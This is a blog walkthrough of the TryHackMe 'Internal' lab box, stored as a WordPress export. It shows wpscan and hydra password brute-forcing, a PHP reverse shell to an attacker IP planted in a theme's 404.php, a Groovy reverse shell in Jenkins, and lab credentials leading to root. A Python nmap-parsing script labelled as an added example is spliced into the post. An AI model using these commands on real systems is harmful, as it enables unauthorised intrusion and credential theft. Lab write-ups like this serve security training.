{"id":131915,"date":"2023-02-17T19:26:02","date_gmt":"2023-02-17T19:26:02","guid":{"rendered":"https:\/\/blog.finxter.com\/?p=1141940"},"modified":"2023-02-17T19:26:02","modified_gmt":"2023-02-17T19:26:02","slug":"tryhackme-how-i-used-wpscan-to-extract-login-credentials-wordpress","status":"publish","type":"post","link":"https:\/\/sickgaming.net\/blog\/2023\/02\/17\/tryhackme-how-i-used-wpscan-to-extract-login-credentials-wordpress\/","title":{"rendered":"TryHackMe \u2013 How I Used WPScan to Extract Login Credentials (WordPress)"},"content":{"rendered":"\n<h2>CHALLENGE OVERVIEW<\/h2>\n<figure class=\"wp-block-embed-youtube wp-block-embed is-type-video is-provider-youtube\"><a href=\"https:\/\/blog.finxter.com\/tryhackme-how-i-used-wpscan-to-extract-login-credentials-wordpress\/\"><img decoding=\"async\" src=\"https:\/\/blog.finxter.com\/wp-content\/plugins\/wp-youtube-lyte\/lyteCache.php?origThumbUrl=https%3A%2F%2Fi.ytimg.com%2Fvi%2FXF3NcIh8C9w%2Fhqdefault.jpg\" alt=\"YouTube Video\"><\/a><figcaption><\/figcaption><\/figure>\n<ul>\n<li><strong>CTF Creator: <\/strong><a rel=\"noreferrer noopener\" href=\"https:\/\/tryhackme.com\/p\/TheMayor\" target=\"_blank\"><strong>TheMayor<\/strong><\/a><\/li>\n<li><strong>Link<\/strong>: <a href=\"https:\/\/tryhackme.com\/room\/internal\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/tryhackme.com\/room\/internal<\/a><\/li>\n<li><strong>Difficulty<\/strong>: Hard<\/li>\n<li><strong>Target<\/strong>: Root\/User flags<\/li>\n<li><strong>Highlight<\/strong>: Enumerating a WordPress site with <code>wpscan<\/code><\/li>\n<li><strong>Tools used<\/strong>: <code>pentest.ws<\/code>, <code>nmap<\/code>, <code>dirb<\/code>, <code>wpscan<\/code>, <code>hydra<\/code>, <code>linpeas<\/code>, <code>ssh<\/code> with <a href=\"https:\/\/blog.finxter.com\/tryhackme-badbyte-walkthrough-how-i-used-port-forwarding-to-hack-into-an-internal-sites-server\/\" data-type=\"post\" data-id=\"1041685\" target=\"_blank\" rel=\"noreferrer noopener\">port forwarding<\/a><\/li>\n<li><strong>Tags<\/strong>: <em>CTF, security, accessible, pentest, blackbox<\/em><\/li>\n<\/ul>\n<h2>BACKGROUND<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"624\" height=\"941\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-249.png\" alt=\"\" class=\"wp-image-1142194\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-249.png 624w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-249-199x300.png 199w\" sizes=\"auto, (max-width: 624px) 100vw, 624px\" \/><\/figure>\n<\/div>\n<p>This CTF challenge is another blackbox-style pentest: we know nothing about the target other than its IP address.<\/p>\n<p>We will have to discover the ports and services running on the server with our standard pentesting tools, <code>nmap<\/code> and <code>dirb<\/code>, since we have no inside information about the backend of the target machine.
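<\/p>
<p>The recon below exports the <code>nmap<\/code> results as XML (<code>-oX<\/code>) so that <code>pentest.ws<\/code> can parse them. The following Python script is an added example, not code from this post or from pentest.ws, of what such a parser does: it walks the <code>host\/ports\/port<\/code> elements of an <code>nmaprun<\/code> document and pulls out the open ports, their services, and the base URLs worth handing to <code>dirb<\/code> or <code>wpscan<\/code>. The XML it parses is a constructed sample in the shape <code>nmap -oX<\/code> writes, with placeholder products and versions; it is not the scan output from this box.<\/p>

```python
import xml.etree.ElementTree as ET

# Constructed sample in the shape `nmap -oX` writes for one host. Everything in
# it is invented for this example (products/versions are placeholders); it is
# not the scan output from the post.
SAMPLE_NMAP_XML = '''<nmaprun scanner='nmap' args='nmap -A -oX nmap.txt 10.10.61.252 -p-' version='7.93'>
  <host>
    <status state='up' reason='echo-reply'/>
    <address addr='10.10.61.252' addrtype='ipv4'/>
    <hostnames><hostname name='internal.thm' type='user'/></hostnames>
    <ports>
      <port protocol='tcp' portid='22'>
        <state state='open' reason='syn-ack'/>
        <service name='ssh' product='OpenSSH' version='7.6p1' method='probed' conf='10'/>
      </port>
      <port protocol='tcp' portid='80'>
        <state state='open' reason='syn-ack'/>
        <service name='http' product='Apache httpd' version='2.4.29' method='probed' conf='10'/>
      </port>
      <port protocol='tcp' portid='8080'>
        <state state='filtered' reason='no-response'/>
        <service name='http-proxy' method='table' conf='3'/>
      </port>
    </ports>
  </host>
</nmaprun>
'''


def parse_nmap_xml(xml_text):
    '''Flatten an nmaprun document into one dict per scanned port.

    Only the fields a findings tracker cares about are kept: address, hostname,
    port, protocol, state, the service/product/version triple and whether nmap
    saw TLS in front of the service (the tunnel attribute).
    '''
    root = ET.fromstring(xml_text)
    findings = []
    for host in root.iter('host'):
        addr = ''
        for address in host.findall('address'):
            if address.get('addrtype') == 'ipv4':
                addr = address.get('addr', '')
        hostname_el = host.find('hostnames/hostname')
        hostname = hostname_el.get('name', '') if hostname_el is not None else ''
        for port in host.findall('ports/port'):
            state = port.find('state')
            service = port.find('service')
            svc = service.attrib if service is not None else {}
            findings.append({
                'host': addr,
                'hostname': hostname,
                'port': int(port.get('portid')),
                'proto': port.get('protocol', 'tcp'),
                'state': state.get('state') if state is not None else 'unknown',
                'service': svc.get('name', ''),
                'product': svc.get('product', ''),
                'version': svc.get('version', ''),
                'tunnel': svc.get('tunnel', ''),
            })
    return findings


def open_ports(findings):
    '''Keep only ports nmap confirmed open; filtered/closed are noise for recon.'''
    return [f for f in findings if f['state'] == 'open']


def web_targets(findings):
    '''Build the base URLs to hand to dirb/wpscan from the open web services.'''
    urls = []
    for f in open_ports(findings):
        is_web = f['service'].startswith('http') or f['port'] in (80, 443, 8080, 8443)
        if not is_web:
            continue
        scheme = 'https' if f['tunnel'] == 'ssl' or f['port'] in (443, 8443) else 'http'
        # Prefer the hostname: vhost-routed apps (WordPress included) often
        # redirect or break when addressed by bare IP.
        host = f['hostname'] or f['host']
        urls.append('%s://%s:%d' % (scheme, host, f['port']))
    return urls


if __name__ == '__main__':
    results = parse_nmap_xml(SAMPLE_NMAP_XML)
    for f in open_ports(results):
        print('%s:%d/%s  %s %s %s' % (f['host'], f['port'], f['proto'],
                                       f['service'], f['product'], f['version']))
    print('web targets:', web_targets(results))
```

<p>The sample is parsed with the standard library because it is our own scan output. XML uploaded by other people, which is exactly what a hosted note-taking service such as <code>pentest.ws<\/code> accepts, should go through <code>defusedxml<\/code> instead: stock <code>ElementTree<\/code> does not protect against entity-expansion attacks on older expat builds.<\/p>
<p>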
<\/p>\n<p>Let\u2019s get started!<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"840\" height=\"474\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-237.png\" alt=\"\" class=\"wp-image-1141967\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-237.png 840w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-237-300x169.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-237-768x433.png 768w\" sizes=\"auto, (max-width: 840px) 100vw, 840px\" \/><\/figure>\n<\/div>\n<p>We\u2019ll be testing out the website <code>pentest.ws<\/code> during today\u2019s video walkthrough. <\/p>\n<p>It is a site designed for pentesters to keep track of their enumeration and credentials. The paid version also helps pentesters create professional VAPT reports (vulnerability assessment and penetration testing reports). <\/p>\n<p>At the end of this post, I will summarize my thoughts on using <code>pentest.ws<\/code> for the first time.<\/p>\n<h2>ENUMERATION\/RECON<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"735\" height=\"481\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-250.png\" alt=\"\" class=\"wp-image-1142210\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-250.png 735w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-250-300x196.png 300w\" sizes=\"auto, (max-width: 735px) 100vw, 735px\" \/><\/figure>\n<\/div>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo nmap -A -oX nmap.txt $targetIP -p-<\/pre>\n<p>Today we are exporting our <code>nmap<\/code> results in <a 
href=\"https:\/\/blog.finxter.com\/parsing-xml-files-in-python-a-simple-guide\/\" data-type=\"post\" data-id=\"883225\" target=\"_blank\" rel=\"noreferrer noopener\">XML<\/a> format so that we can upload them to <code>pentest.ws<\/code> and have the site automatically parse our findings.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">dirb http:\/\/$targetIP -o dirb.txt<\/pre>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"517\" height=\"192\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-238.png\" alt=\"\" class=\"wp-image-1141980\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-238.png 517w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-238-300x111.png 300w\" sizes=\"auto, (max-width: 517px) 100vw, 517px\" \/><\/figure>\n<\/div>\n<p><code>dirb<\/code> finds a <code>\/blog<\/code> directory, and behind it a WordPress login at: <a href=\"http:\/\/internal.thm\/blog\/wp-login.php\" target=\"_blank\" rel=\"noreferrer noopener\">http:\/\/internal.thm\/blog\/wp-login.php<\/a> (the hostname <code>internal.thm<\/code> needs an <code>\/etc\/hosts<\/code> entry pointing at the target IP).<\/p>\n<h2>USING WPSCAN TO EXTRACT WORDPRESS LOGIN CREDENTIALS<\/h2>\n<p>Let\u2019s use <code>wpscan<\/code> to enumerate the WordPress users (<code>u<\/code>) and any vulnerable plugins (<code>vp<\/code>); a valid username is what we need before we can attack the password.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">wpscan --url 10.10.61.252\/blog -e vp,u -o wpscan.txt<\/pre>\n<p>Plugin vulnerability data is only reported when <code>wpscan<\/code> has a WPScan API token (<code>--api-token<\/code>); without one it still lists the plugins and users it finds, which is what matters here.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"826\" height=\"330\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-239.png\" alt=\"\" class=\"wp-image-1141988\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-239.png 826w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-239-300x120.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-239-768x307.png 768w\" sizes=\"auto, (max-width: 826px) 100vw, 826px\" \/><\/figure>\n<\/div>\n<p>Now that we have a username, <code>admin<\/code>, we can run <code>wpscan<\/code> again with a wordlist to brute-force the password. <code>wpscan<\/code> picks the attack method itself: if <code>xmlrpc.php<\/code> is enabled it uses an XML-RPC <code>system.multicall<\/code> attack that tests many passwords per request, otherwise it posts to <code>wp-login.php<\/code>.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">wpscan --url 10.10.61.252\/blog --usernames admin --passwords \/home\/kalisurfer\/hacking-tools\/rockyou.txt --max-threads 50 -o wpscan-passwds.txt<\/pre>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"727\" height=\"640\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-240.png\" alt=\"\" class=\"wp-image-1141991\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-240.png 727w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-240-300x264.png 300w\" sizes=\"auto, (max-width: 727px) 100vw, 727px\" \/><\/figure>\n<\/div>\n<p>We found the admin password:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">admin:my2boys<\/pre>\n<p>Now we can log into WordPress and look for a place to upload a <a href=\"https:\/\/blog.finxter.com\/ezpzshell-a-cool-all-in-one-python-script-that-simplifies-revshell-creation\/\" data-type=\"post\" data-id=\"1118920\" target=\"_blank\" rel=\"noreferrer noopener\">revshell<\/a>.<\/p>\n<h2>INITIAL FOOTHOLD &#8211; SPAWN A REVSHELL BY EDITING 404.PHP<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"647\" height=\"528\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-241.png\" alt=\"\" class=\"wp-image-1141996\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-241.png 647w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-241-300x245.png 300w\" sizes=\"auto, (max-width: 647px) 100vw, 647px\" \/><\/figure>\n<\/div>\n<p>We\u2019ll open the theme editor (Appearance &gt; Theme Editor), edit the <code>404.php<\/code> template of the active <code>twentyseventeen<\/code> theme, and drop in a PHP revshell generated with EzpzShell.py. <\/p>\n<p>If you want to learn more about <strong><code>ezpzshell<\/code><\/strong>, check out my previous blog post:<\/p>\n<p class=\"has-base-background-color has-background\">\ud83d\udc49 <strong>Learn More<\/strong>: <a href=\"https:\/\/blog.finxter.com\/ezpzshell-a-cool-all-in-one-python-script-that-simplifies-revshell-creation\/\" data-type=\"URL\" data-id=\"https:\/\/blog.finxter.com\/ezpzshell-a-cool-all-in-one-python-script-that-simplifies-revshell-creation\/\" target=\"_blank\" rel=\"noreferrer noopener\">EzpzShell: An Easy-Peasy Python Script That Simplifies Revshell Creation<\/a><\/p>\n<p><code>ezpz 10.6.2.23 8888 php<\/code> (<code>ezpzshell<\/code> also automatically starts a listener on that port)<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"404\" height=\"238\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-242.png\" alt=\"\" class=\"wp-image-1142014\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-242.png 404w, 
https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-242-300x177.png 300w\" sizes=\"auto, (max-width: 404px) 100vw, 404px\" \/><\/figure>\n<\/div>\n<p>After copying the payload to <code>404.php<\/code>, we make sure it is saved and then trigger the payload:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">http:\/\/internal.thm\/wordpress\/wp-content\/themes\/twentyseventeen\/404.php<\/pre>\n<p>And if everything is set up correctly, we will catch the revshell with <code>ezpz<\/code> as user: <code>www-data<\/code>.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"407\" height=\"177\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-243.png\" alt=\"\" class=\"wp-image-1142019\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-243.png 407w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-243-300x130.png 300w\" sizes=\"auto, (max-width: 407px) 100vw, 407px\" \/><\/figure>\n<\/div>\n<h2>STABILIZE THE SHELL<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"738\" height=\"488\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-251.png\" alt=\"\" class=\"wp-image-1142219\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-251.png 738w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-251-300x198.png 300w\" sizes=\"auto, (max-width: 738px) 100vw, 738px\" \/><\/figure>\n<\/div>\n<p>The following command will stabilize the shell:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" 
data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">python3 -c 'import pty;pty.spawn(\"\/bin\/bash\")'<\/pre>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"411\" height=\"177\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-247.png\" alt=\"\" class=\"wp-image-1142078\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-247.png 411w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-247-300x129.png 300w\" sizes=\"auto, (max-width: 411px) 100vw, 411px\" \/><\/figure>\n<\/div>\n<p>This gives us a proper PTY. For tab completion and a working <code>Ctrl-C<\/code> as well, background the shell with <code>Ctrl-Z<\/code>, run <code>stty raw -echo; fg<\/code> on the attack machine, then <code>export TERM=xterm<\/code> in the target shell.<\/p>\n<h2>INTERNAL ENUMERATION &#8211; FIND USER CREDS<\/h2>\n<p>Enumerating the file system as <code>www-data<\/code>, we discover a text file with credentials:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">cat wp-save.txt\nBill,\nAubreanna needed these credentials for something later. Let her know you have them and where they are.\naubreanna:bubb13guM!@#123\n<\/pre>\n<p>Let\u2019s try switching users to <code>aubreanna<\/code> with the password given in <code>wp-save.txt<\/code>.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">su aubreanna<\/pre>\n<p>We are in as user <code>aubreanna<\/code> and immediately find the user flag in her home directory.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">aubreanna@internal:~$ cat user.txt\nTHM{i\u2014------omitted--------1}\n<\/pre>\n<h2>MORE ENUMERATION &#8211; DISCOVER A JENKINS SERVICE<\/h2>\n<p>A second note in the same directory points at a service we could not see from the outside:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">cat jenkins.txt\nInternal Jenkins service is running on 172.17.0.2:8080\n<\/pre>\n<p><code>172.17.0.2<\/code> is an address on the host\u2019s Docker bridge network, so the Jenkins container is reachable only from the host itself. Since we have aubreanna\u2019s password and SSH is open, we can tunnel to it.<\/p>\n<h2>SET UP PORT FORWARDING VIA SSH LOGIN<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"735\" height=\"480\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-252.png\" alt=\"\" class=\"wp-image-1142227\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-252.png 735w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-252-300x196.png 300w\" sizes=\"auto, (max-width: 735px) 100vw, 735px\" \/><\/figure>\n<\/div>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">ssh -L 8080:172.17.0.2:8080 aubreanna@10.10.61.252<\/pre>\n<p><code>-L 8080:172.17.0.2:8080<\/code> binds port 8080 on our attack machine and forwards every connection to it through the SSH session to <code>172.17.0.2:8080<\/code> on the far side.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"570\" height=\"631\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-246.png\" alt=\"\" class=\"wp-image-1142074\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-246.png 570w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-246-271x300.png 271w\" sizes=\"auto, (max-width: 570px) 100vw, 570px\" \/><\/figure>\n<\/div>\n<p>Success! We\u2019ve connected to Jenkins through the SSH port forward and can now open the <a href=\"https:\/\/blog.finxter.com\/tryhackme-alfred-how-i-solved-the-challenge\/\" data-type=\"post\" data-id=\"1000191\" target=\"_blank\" rel=\"noreferrer noopener\">Jenkins<\/a> login page in our browser at <code>http:\/\/127.0.0.1:8080<\/code>.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"781\" height=\"672\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-245.png\" alt=\"\" class=\"wp-image-1142071\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-245.png 781w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-245-300x258.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-245-768x661.png 768w\" sizes=\"auto, (max-width: 781px) 100vw, 781px\" \/><\/figure>\n<\/div>\n<h2>BRUTE-FORCE THE LOGIN<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"741\" height=\"487\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-253.png\" alt=\"\" class=\"wp-image-1142235\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-253.png 741w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-253-300x197.png 300w\" sizes=\"auto, (max-width: 741px) 100vw, 741px\" \/><\/figure>\n<\/div>\n<p>With the tunnel up, we point <code>hydra<\/code> at the local end of it (<code>127.0.0.1:8080<\/code>) and at the form Jenkins posts logins to, <code>\/j_acegi_security_check<\/code>:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">hydra -l admin -P \/home\/kalisurfer\/hacking-tools\/SecLists\/Passwords\/Leaked-Databases\/rockyou-75.txt -s 8080 127.0.0.1 http-post-form '\/j_acegi_security_check:j_username=admin&amp;j_password=^PASS^&amp;from=%2F&amp;Submit=Sign+in&amp;login=:Invalid username or password'<\/pre>\n<p>The <code>http-post-form<\/code> argument has three colon-separated parts:<\/p>\n<ol>\n<li>the login path (<code>\/j_acegi_security_check<\/code>) that the browser posts the form to<\/li>\n<li>the request body captured from a real login attempt, edited so the username is <code>admin<\/code> and <code>^PASS^<\/code> stands in for the password; hydra substitutes each wordlist entry there<\/li>\n<li>the error message the site returns for a wrong password (<code>Invalid username or password<\/code>); any response that does not contain it is reported as a valid login, so pick a string that only appears on failure<\/li>\n<\/ol>\n<p>Capturing one manual login attempt in Burp Suite or the Firefox developer tools gives us these strings, which we then modify into the final hydra payload.<\/p>\n<p><strong>Output:<\/strong><\/p>\n<pre class=\"wp-block-preformatted\"><code>Hydra v9.1 (c) 2020 by van Hauser\/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2023-02-06 08:57:08\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 59185 login tries (l:1\/p:59185), ~3700 tries per task\n[DATA] attacking http-post-form:\/\/127.0.0.1:8080\/j_acegi_security_check:j_username=admin&amp;j_password=^PASS^&amp;from=%2F&amp;Submit=Sign+in&amp;login=:Invalid username or password\n[STATUS] 396.00 tries\/min, 396 tries in 00:01h, 58789 to do in 02:29h, 16 active\n[8080][http-post-form] host: 127.0.0.1 login: admin password: spongebob\n1 of 1 target successfully completed, 1 valid password found\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2023-02-06 08:58:10<\/code>\n<\/pre>\n<p>Credentials found! <code>admin:spongebob<\/code><\/p>\n<h2>ENUMERATING JENKINS AS ADMIN<\/h2>\n<p>We\u2019ll use the Jenkins script console to spawn another revshell, this time written in the <em>Groovy<\/em> scripting language. <\/p>\n<p>We\u2019ll use <code>ezpzshell<\/code> and choose the Java payload, because Groovy runs on the JVM and accepts Java syntax, so it pastes straight into the script console. This time when we catch it, we are user <code>jenkins<\/code> inside the container. <\/p>\n<p>Manually enumerating the container\u2019s file system we stumble across a <code>note.txt<\/code>. Let\u2019s check out the contents:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">cat note.txt<\/pre>\n<p>Output:<\/p>\n<pre class=\"wp-block-preformatted\"><code>Aubreanna, Will wanted these credentials secured behind the Jenkins container since we have several layers of defense here. Use them if you need access to the root user account.\nroot:tr0ub13guM!@#123\n<\/code><\/pre>\n<p>Bingo! We found the root credentials.<\/p>\n<h2>SWITCH USERS TO ROOT<\/h2>\n<p>Back in our SSH session on the host as <code>aubreanna<\/code> (the Jenkins shell runs inside the container), we switch to root and grab the flag:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">su root\nroot@internal:~# cat root.txt\nTHM{d\u2014-omitted\u20143r}\n<\/pre>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"403\" height=\"208\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-244.png\" alt=\"\" class=\"wp-image-1142068\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-244.png 403w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-244-300x155.png 300w\" sizes=\"auto, (max-width: 403px) 100vw, 403px\" \/><\/figure>\n<\/div>\n<h2>FINAL THOUGHTS<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"707\" height=\"943\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-254.png\" alt=\"\" class=\"wp-image-1142241\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-254.png 707w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-254-225x300.png 225w\" sizes=\"auto, (max-width: 707px) 100vw, 707px\" \/><\/figure>\n<\/div>\n<p>I\u2019m not convinced yet that <code>pentest.ws<\/code> will save me much time on my note taking. Maybe with time and experience it would help. <\/p>\n<p>I think the report features that are available for paying subscribers might be just helpful enough to keep me using their platform. <\/p>\n<p>However, I have concerns about the security of their platform, as findings from pentesting are sensitive and generally include login credentials and other passwords.
